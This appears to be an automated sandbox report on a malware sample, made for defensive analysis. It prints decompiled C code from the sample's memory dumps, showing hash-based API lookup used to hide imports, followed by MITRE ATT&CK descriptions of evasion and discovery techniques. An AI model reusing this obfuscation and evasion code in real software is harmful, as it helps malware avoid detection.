0x10011803
0x10011805
0x10011809
0x1001180d
0x1001181a
0x10011827
0x1001182b
0x1001183f
0x10011843
0x00000000
0x00000000
0x10011858
0x1001185a
0x10011862
0x1001185f
0x1001185f
0x1001185f
0x10011866
0x10011868
0x1001186e
0x10011874
0x100118d0
0x100118d9
0x100118dd
0x100118ea
0x100118f3
0x100118f8
0x100118fc
0x100118ff
0x10011960
0x10011976
0x10011981
0x10011982
0x10011983
0x10011987
0x1001198a
0x10011c0a
0x10011c0d
0x10011c0d
0x00000000
0x1001198a
0x10011909
0x10011919
0x10011922
0x1001192b
0x10011934
0x10011935
0x10011936
0x1001193b
0x10011943
0x1001194b
0x00000000
0x00000000
0x00000000
0x1001194d
0x1001187d
0x10011882
0x10011886
0x10011886
0x1001188a
0x1001188d
0x00000000
0x00000000
0x100118ae
0x100118b0
0x100118b4
0x100118b6
0x00000000
0x00000000
0x100118b8
0x100118bf
0x100118cb
0x00000000
0x100118cb
0x10011892
0x00000000
0x10011990
0x10011990
0x10011991
0x100119a1
0x100119ad
0x100119b6
0x100119bf
0x100119c8
0x00000000
0x100119c8
0x10011677
0x10011679
0x1001167b
0x10011680
0x10011685
0x10011698
0x100116ae
0x100116b7
0x100116b8
0x100116b8
0x100116ba
0x100116bb
0x100116be
0x100116c2
0x00000000
0x1001167b
0x10011617
0x10011621
0x10011622
0x10011622
0x1001162f
0x1001163b
0x1001163d
0x1001163f
0x10011643
0x10011653
0x10011653
0x1001165a
0x1001165d
0x1001165e
0x10011662
0x1001166c
0x00000000
0x1001166c

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02e401e674f8dbd8a361c02bb20d32a1f022309eb3d2da855e9b883be952c981
Instruction ID: b1410cd0d196bac93b6c766087412172e782a524cb2907c5cacc11c56020be0d
Opcode Fuzzy Hash: 02e401e674f8dbd8a361c02bb20d32a1f022309eb3d2da855e9b883be952c981
Instruction Fuzzy Hash: 99327C745083418FD718DF28C881AAFB7E5FF94384F10892DF5958B2A6EB70E985CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10011D58, Relevance: .3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E10011D58(intOrPtr __eax) {
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				signed char _t84;
				signed char _t86;
				signed char _t89;
				signed char _t92;
				signed char _t95;
				signed char* _t99;
				void* _t113;
				signed char _t114;
				signed char _t116;
				signed char _t118;
				intOrPtr _t119;
				signed char _t120;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed char _t143;
				signed char _t145;
				signed char _t146;
				signed int _t147;
				signed char _t148;
				void* _t151;
				signed char _t155;
				signed char _t159;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				void* _t170;
				void* _t171;
				intOrPtr _t172;
				signed char _t173;
				intOrPtr _t174;
				intOrPtr* _t175;
				signed char _t176;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				signed char* _t181;

				_t119 = __eax;
				_t143 =  *0x1001d21c; // 0x24b4518
				if(_t143 == 0x76470dcb) {
					_t143 = 0;
					 *0x1001d21c = 0;
				}
				if(_t119 != 0xfe338407) {
					L4:
					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					if(_t119 != 0xa7e21d79) {
						while(1) {
							L10:
							__eflags = _t143;
							if(_t143 == 0) {
								break;
							}
							_t72 = 0;
							_t120 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
									break;
								}
								_t72 = _t72 + 1;
								_t120 = _t120 + 0x10;
								__eflags = _t72 - 0x10;
								if(_t72 < 0x10) {
									continue;
								}
								_t5 = _t143 + 0x100; // 0x0
								_t143 =  *_t5;
								goto L10;
							}
							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
						}
						__eflags = _t119 - 0x94e21d79;
						if(_t119 != 0x94e21d79) {
							_t74 =  *((intOrPtr*)(_t174 + 0xc));
							_t175 =  *((intOrPtr*)(_t74 + 0xc));
							_t181[4] =  *(_t74 + 0x10);
							while(1) {
								_t172 =  *((intOrPtr*)(_t175 + 0x30));
								_t75 = 0;
								__eflags = 0;
								while(1) {
									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
									_t181[0x1c + _t75 * 2] = _t145;
									__eflags = _t145;
									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
									if(_t145 == 0) {
										break;
									}
									_t75 = _t75 + 1;
									__eflags = _t75 - _t146;
									if(_t75 <= _t146) {
										continue;
									}
									break;
								}
								__eflags = _t146;
								_t147 = 0;
								if(_t146 <= 0) {
									L34:
									_t76 = E10014FD4( &(_t181[0x13c]), _t147);
									__eflags = _t119 - (_t76 ^ 0x7af3da47);
									if(_t119 == (_t76 ^ 0x7af3da47)) {
										_t173 =  *(_t175 + 0x18);
										__eflags = _t173;
										if(_t173 == 0) {
											L55:
											return _t173;
										}
										L38:
										_t148 =  *0x1001d2ec; // 0x0
										__eflags = _t148 |  *0x1001d2ed;
										if((_t148 |  *0x1001d2ed) == 0) {
											_t176 =  *0x1001d21c; // 0x24b4518
											__eflags = _t176;
											if(_t176 == 0) {
												 *0x1001d2ec = 1;
												_t177 = E100135F4(0x104);
												__eflags = _t177;
												if(_t177 == 0) {
													_t177 = 0;
													__eflags = 0;
													L62:
													 *0x1001d21c = _t177;
													 *0x1001d214 = E10013044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
													 *0x1001d2ec = 0;
													L45:
													_t151 = 0;
													_t165 = 0;
													__eflags = 0;
													while(1) {
														__eflags =  *(_t165 + _t177 + 8);
														if( *(_t165 + _t177 + 8) == 0) {
															break;
														}
														_t151 = _t151 + 1;
														_t165 = _t165 + 0x10;
														__eflags = _t151 - 0x10;
														if(_t151 < 0x10) {
															continue;
														}
														_t84 = E100135F4(0x104);
														_t181[4] = _t84;
														__eflags =  *_t181;
														if( *_t181 == 0) {
															 *_t181 = 0;
															L53:
															 *( *_t181 + 0xc) = _t173;
															E1000D03C( *_t181,  &(_t181[0x1c]));
															_t155 =  *_t181;
															 *((intOrPtr*)(_t155 + 8)) = _t119;
															 *(_t177 + 0x100) = _t155;
															goto L55;
														}
														_t167 = _t84;
														_t86 = 0x10;
														do {
															_t181[0x13c] = _t86;
															E1000CFC8(_t167, 0);
															 *((intOrPtr*)(_t167 + 8)) = 0;
															 *((intOrPtr*)(_t167 + 0xc)) = 0;
															_t167 = _t167 + 0x10;
															_t86 = _t181[0x138] - 1;
															__eflags = _t86;
														} while (_t86 != 0);
														 *( *_t181 + 0x100) = 0;
														goto L53;
													}
													_t166 = _t165 + _t177;
													__eflags = _t166;
													 *(_t166 + 0xc) = _t173;
													E1000D03C(_t166,  &(_t181[0x1c]));
													 *((intOrPtr*)(_t166 + 8)) = _t119;
													goto L55;
												}
												_t168 = _t177;
												_t89 = 0x10;
												do {
													_t181[4] = _t89;
													E1000CFC8(_t168, 0);
													 *((intOrPtr*)(_t168 + 8)) = 0;
													 *((intOrPtr*)(_t168 + 0xc)) = 0;
													_t168 = _t168 + 0x10;
													_t89 =  *_t181 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t177 + 0x100) = 0;
												goto L62;
											}
											_t47 = _t176 + 0x100; // 0x0
											_t159 =  *_t47;
											while(1) {
												__eflags = _t159;
												if(_t159 == 0) {
													goto L45;
												}
												_t177 = _t159;
												_t159 =  *(_t159 + 0x100);
											}
											goto L45;
										}
										__eflags = _t119 - 0xfe338407;
										if(_t119 == 0xfe338407) {
											 *0x1001d220 = _t173;
										}
										goto L55;
									}
									__eflags = _t175 - _t181[4];
									if(_t175 != _t181[4]) {
										_t175 =  *_t175;
										continue;
									}
									L36:
									_t173 = 0;
									goto L55;
								}
								_t92 = 0;
								__eflags = 0;
								while(1) {
									_t126 =  *((char*)(_t172 + _t147 * 2));
									 *_t181 = _t92;
									_t39 = _t126 - 0x41; // -81
									__eflags = _t39 - 0x19;
									_t40 = _t126 + 0x20; // 0x10
									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
									_t181[_t147 + 0x13c] = _t127;
									_t95 =  *_t181;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L34;
									}
									_t92 = _t95 + 1;
									_t147 = _t147 + 1;
									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
										continue;
									}
									goto L34;
								}
								goto L34;
							}
						}
						_t170 = E10019A00();
						_t178 = 0;
						while(1) {
							_t129 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L16;
							}
							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
							__eflags = _t116;
							if(_t116 != 0) {
								goto L36;
							}
							L16:
							_t99 =  &(_t181[0x120]);
							_t173 =  *_t99;
							_t130 = _t99[8];
							__eflags = _t173 - _t170;
							if(_t173 > _t170) {
								L13:
								_t178 = _t178 + _t130;
								__eflags = _t178;
								continue;
							}
							__eflags = _t130 + _t173 - _t170;
							if(_t130 + _t173 <= _t170) {
								goto L13;
							}
							__eflags = _t173;
							if(_t173 == 0) {
								goto L55;
							}
							E1000F5A8( &(_t181[0x10]), 0x400);
							_t171 = E1000F4E0( &(_t181[0x10]), 0);
							_t179 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t179;
							if(_t179 == 0) {
								L21:
								E1000D000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
								__eflags = E1000D210( &(_t181[8]), 0x5c);
								if(__eflags != 0) {
									_push(0x5c);
									E1000D650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
									E1000D03C( &(_t181[8]), _t181[0x1bc]);
									E1000D020( &(_t181[0x1bc]));
								}
								E1000DE70( &(_t181[0x20]), _t181[4], 0);
								E1000D020( &(_t181[4]));
								L24:
								E1000F678( &(_t181[0xc]));
								goto L38;
							}
							 *_t181 = E1000F4E0( &(_t181[0x10]), 0);
							_t113 = E1000F4F0( &(_t181[0xc]));
							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
							__eflags = _t114;
							if(_t114 != 0) {
								goto L24;
							}
							goto L21;
						}
					}
					return  *((intOrPtr*)(_t174 + 8));
				} else {
					_t118 =  *0x1001d220; // 0x77120000
					if(_t118 != 0xe86b6198) {
						return _t118;
					}
					goto L4;
				}
			}

0x10011d62
0x10011d64
0x10011d70
0x10011d72
0x10011d74
0x10011d74
0x10011d80
0x10011d92
0x10011d98
0x10011da1
0x10011dc8
0x10011dc8
0x10011dc8
0x10011dca
0x00000000
0x00000000
0x10011dab
0x10011dad
0x10011dad
0x10011daf
0x10011daf
0x10011db3
0x00000000
0x00000000
0x10011db9
0x10011dba
0x10011dbd
0x10011dc0
0x00000000
0x00000000
0x10011dc2
0x10011dc2
0x00000000
0x10011dc2
0x00000000
0x100120f1
0x10011dcc
0x10011dd2
0x10011efe
0x10011f04
0x10011f07
0x10011f10
0x10011f10
0x10011f13
0x10011f13
0x10011f15
0x10011f15
0x10011f19
0x10011f1e
0x10011f20
0x10011f24
0x00000000
0x00000000
0x10011f26
0x10011f27
0x10011f29
0x00000000
0x00000000
0x00000000
0x10011f29
0x10011f2b
0x10011f2f
0x10011f30
0x10011f62
0x10011f69
0x10011f73
0x10011f75
0x10011f84
0x10011f87
0x10011f89
0x10012071
0x00000000
0x10012071
0x10011f8f
0x10011f8f
0x10011f95
0x10011f9b
0x10011fb4
0x10011fba
0x10011fbc
0x10012085
0x10012091
0x10012094
0x10012096
0x100120c7
0x100120c7
0x100120c9
0x100120d5
0x100120e0
0x100120e5
0x10011fd6
0x10011fd6
0x10011fd8
0x10011fd8
0x10011fda
0x10011fda
0x10011fdf
0x00000000
0x00000000
0x10011fe1
0x10011fe2
0x10011fe5
0x10011fe8
0x00000000
0x00000000
0x10011fef
0x10011ff4
0x10011ff9
0x10011ffd
0x10012038
0x1001203f
0x10012047
0x1001204a
0x1001204f
0x10012052
0x10012055
0x00000000
0x10012055
0x10011fff
0x10012003
0x10012004
0x10012008
0x1001200f
0x1001201d
0x10012020
0x10012023
0x10012026
0x10012026
0x10012026
0x1001202c
0x00000000
0x1001202c
0x1001205d
0x1001205d
0x10012066
0x10012069
0x1001206e
0x00000000
0x1001206e
0x10012098
0x1001209c
0x1001209d
0x100120a1
0x100120a5
0x100120af
0x100120b2
0x100120b5
0x100120b8
0x100120b8
0x100120b8
0x100120bb
0x00000000
0x100120bb
0x10011fc2
0x10011fc2
0x10011fd2
0x10011fd2
0x10011fd4
0x00000000
0x00000000
0x10011fca
0x10011fcc
0x10011fcc
0x00000000
0x10011fd2
0x10011f9d
0x10011fa3
0x10011fa9
0x10011fa9
0x00000000
0x10011fa3
0x10011f77
0x10011f7b
0x10011f0d
0x00000000
0x10011f0d
0x10011f7d
0x10011f7d
0x00000000
0x10011f7d
0x10011f32
0x10011f32
0x10011f34
0x10011f34
0x10011f38
0x10011f3b
0x10011f3e
0x10011f41
0x10011f47
0x10011f4a
0x10011f51
0x10011f54
0x10011f56
0x00000000
0x00000000
0x10011f58
0x10011f59
0x10011f5e
0x10011f60
0x00000000
0x00000000
0x00000000
0x10011f60
0x00000000
0x10011f34
0x10011f10
0x10011ddd
0x10011ddf
0x10011de5
0x10011df6
0x10011df8
0x10011dfa
0x00000000
0x00000000
0x10011e0d
0x10011e0f
0x10011e11
0x00000000
0x00000000
0x10011e17
0x10011e17
0x10011e1e
0x10011e20
0x10011e23
0x10011e25
0x10011de3
0x10011de3
0x10011de3
0x00000000
0x10011de3
0x10011e2a
0x10011e2c
0x00000000
0x00000000
0x10011e2e
0x10011e30
0x00000000
0x00000000
0x10011e3f
0x10011e4f
0x10011e62
0x10011e64
0x10011e66
0x10011e91
0x10011e9a
0x10011eaa
0x10011eac
0x10011eb5
0x10011ebc
0x10011ecc
0x10011ed3
0x10011ed3
0x10011ee2
0x10011eeb
0x10011ef0
0x10011ef4
0x00000000
0x10011ef4
0x10011e73
0x10011e7a
0x10011e8b
0x10011e8d
0x10011e8f
0x00000000
0x00000000
0x00000000
0x10011e8f
0x10011de5
0x00000000
0x10011d82
0x10011d82
0x10011d8c
0x1001207d
0x1001207d
0x00000000
0x10011d8c

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f7bfbbeac7002f5c7f106cea70f70043bedb15ef77a7c5651ad3b4c2d2db0b
Instruction ID: 5609b69e05a1b06f5233c8e7297c4b8c04bd3945fb3a39e2e71c43012004eafc
Opcode Fuzzy Hash: 87f7bfbbeac7002f5c7f106cea70f70043bedb15ef77a7c5651ad3b4c2d2db0b
Instruction Fuzzy Hash: 53A1E7746043459BE714EF15C880BAEB3E6FF94340F21CA2DE9948F296D771E982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001326C, Relevance: .1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E1001326C(intOrPtr __ecx, char __edx, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				intOrPtr _v24;
				char _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				char* _t50;
				char* _t51;
				intOrPtr _t52;
				intOrPtr* _t67;
				intOrPtr _t68;
				char _t69;
				intOrPtr* _t71;

				_t69 = __edx;
				_t67 = _a8;
				_t68 = _a12;
				if( *((char*)(E10010754(0) + 0xb)) != 0x40) {
					_v44 = __ecx;
					_v40 = _t69;
					__eflags =  *0x1001d2e8;
					if( *0x1001d2e8 == 0) {
						_t32 = E10013044(0xfe338407, 0x26dec0d0, 0xfe338407, 0xfe338407);
						__eflags = _t32;
						if(_t32 == 0) {
							_t32 = 0;
							__eflags = 0;
						} else {
							_t50 =  &_v40;
							_push( &_a4);
							_push(_a4);
							_push(_t50);
							_push(_t50 - 4);
							_push(_t68);
							asm("int3");
							asm("int3");
						}
					} else {
						_t51 =  &_v40;
						_push( &_a4);
						_push(_a4);
						_push(_t51);
						_push(_t51 - 4);
						_push(_t68);
						_t32 = E10019A10();
					}
					__eflags = _t67;
					if(_t67 == 0) {
						L11:
						return _t32;
					} else {
						 *_t67 = _a4;
						return _t32;
					}
				}
				_t33 =  *0x1001d200;
				_v44 = _t33;
				_t52 =  *0x1001d204; // 0x0
				if(( ~0x66c60414 + _t33 |  ~0x846533c4 + _t52) == 0) {
					_t37 = E1001485C(0xfe338407, 0x26dec0d0, __eflags);
					_v44 = _t37;
					_t52 = 0x26dec0d0;
					 *0x1001d200 = _t37;
					 *0x1001D204 = 0x26dec0d0;
				}
				asm("movd xmm1, ebx");
				asm("cdq");
				asm("movd xmm3, esi");
				_v40 = _t69;
				asm("movd xmm0, edx");
				asm("cdq");
				asm("punpckldq xmm1, xmm0");
				asm("movq [eax], xmm1");
				 *_t71 = _v44;
				asm("movd xmm2, edx");
				asm("cdq");
				asm("movd xmm5, eax");
				asm("punpckldq xmm3, xmm2");
				_v92 = _t52;
				asm("movd xmm4, edx");
				asm("cdq");
				asm("movd xmm7, eax");
				asm("punpckldq xmm5, xmm4");
				asm("movd xmm6, edx");
				asm("cdq");
				asm("movd xmm1, eax");
				asm("punpckldq xmm7, xmm6");
				_v88 = 5;
				asm("movd xmm0, edx");
				asm("movq [esp+0xc], xmm3");
				asm("punpckldq xmm1, xmm0");
				asm("movq [esp+0x14], xmm5");
				asm("movq [esp+0x1c], xmm7");
				_v60 = _a4;
				_v56 = 0;
				 *((intOrPtr*)( &_v32 - 8 + 0x10 - 0xc)) = 0;
				asm("movq [esp+0x2c], xmm1");
				_t32 = E100146B0();
				if(_t67 == 0) {
					goto L11;
				} else {
					 *_t67 = _v24;
					return _t32;
				}
			}

0x10013277
0x10013279
0x1001327d
0x1001328a
0x1001335d
0x10013361
0x10013365
0x1001336c
0x10013394
0x10013399
0x1001339b
0x100133b4
0x100133b4
0x1001339d
0x100133a1
0x100133a8
0x100133a9
0x100133ad
0x100133ae
0x100133af
0x100133b0
0x100133b1
0x100133b1
0x1001336e
0x10013372
0x10013379
0x1001337a
0x1001337e
0x1001337f
0x10013380
0x10013381
0x10013381
0x100133b6
0x100133b8
0x100133c7
0x100133c7
0x100133ba
0x100133be
0x00000000
0x100133be
0x100133b8
0x10013295
0x1001329c
0x100132a9
0x100132b3
0x100133d4
0x100133d9
0x100133dd
0x100133e7
0x100133e9
0x100133e9
0x100132bb
0x100132bf
0x100132c2
0x100132c6
0x100132d0
0x100132d4
0x100132d5
0x100132dd
0x100132e1
0x100132e4
0x100132e8
0x100132e9
0x100132f0
0x100132f4
0x100132f8
0x100132fc
0x100132fd
0x10013304
0x1001330c
0x10013310
0x10013311
0x10013315
0x10013319
0x10013321
0x10013325
0x1001332b
0x1001332f
0x10013335
0x1001333b
0x1001333f
0x10013343
0x10013346
0x1001334c
0x10013353
0x00000000
0x10013355
0x10013359
0x00000000
0x10013359

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22162ae93c47dbab56e107b96e260f9e55788687d1fe2f7b975f1cd78bee16c
Instruction ID: e3f6c5982c7626623671898f30dbd3185825dd02ee7f452558bbdba9e4a39693
Opcode Fuzzy Hash: c22162ae93c47dbab56e107b96e260f9e55788687d1fe2f7b975f1cd78bee16c
Instruction Fuzzy Hash: 5A41B3B15097459FC305DF24C88086BFBE5EFC9380F01DA2EF464AB261EB30EA458B55

Uniqueness

Uniqueness Score: -1.00%

Function 10006D50, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006D50() {

				 *0x1001d280 = GetUserNameW;
				 *0x1001D284 = MessageBoxW;
				 *0x1001D288 = GetLastError;
				 *0x1001D28C = CreateFileA;
				 *0x1001D290 = DebugBreak;
				 *0x1001D294 = FlushFileBuffers;
				 *0x1001D298 = FreeEnvironmentStringsA;
				 *0x1001D29C = GetConsoleOutputCP;
				 *0x1001D2A0 = GetEnvironmentStrings;
				 *0x1001D2A4 = GetLocaleInfoA;
				 *0x1001D2A8 = GetStartupInfoA;
				 *0x1001D2AC = GetStringTypeA;
				 *0x1001D2B0 = HeapValidate;
				 *0x1001D2B4 = IsBadReadPtr;
				 *0x1001D2B8 = LCMapStringA;
				 *0x1001D2BC = LoadLibraryA;
				 *0x1001D2C0 = OutputDebugStringA;
				return 0x1001d280;
			}

0x10006d61
0x10006d69
0x10006d6c
0x10006d7b
0x10006d7e
0x10006d8d
0x10006d90
0x10006d9f
0x10006da2
0x10006db1
0x10006db4
0x10006dc3
0x10006dc6
0x10006dd5
0x10006dd8
0x10006de7
0x10006dea
0x10006ded

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
Instruction ID: 9a9f90be372116ce35b3bf57ca6adafecb814b37ff7dc50591bd4b03753dcc6b
Opcode Fuzzy Hash: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
Instruction Fuzzy Hash: 99110FB8A05620CFD34ACF09D5D49117BF2BB8E360312C19AD8098B376D734D985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000BB88, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E1000BB88(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E1000C2C4(__ecx);
				if(_t1 == 0) {
					_t2 = E1001303C(0xfe338407, 0x77fa1d17);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}

0x1000bb89
0x1000bb8b
0x1000bb92
0x1000bb9e
0x1000bba5
0x1000bba7
0x1000bba9
0x1000bbaa
0x1000bbaa
0x1000bbab
0x00000000
0x1000bbab
0x1000bbb2

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction ID: 5fe623b5cf10148969293d6f758529c8ddca9d899f10fbb442768dac995cb5e5
Opcode Fuzzy Hash: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction Fuzzy Hash: 4BD01235100647AAFF149A65EA61F15A394DF422D0F720859A8406799ECBF6D4524111

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
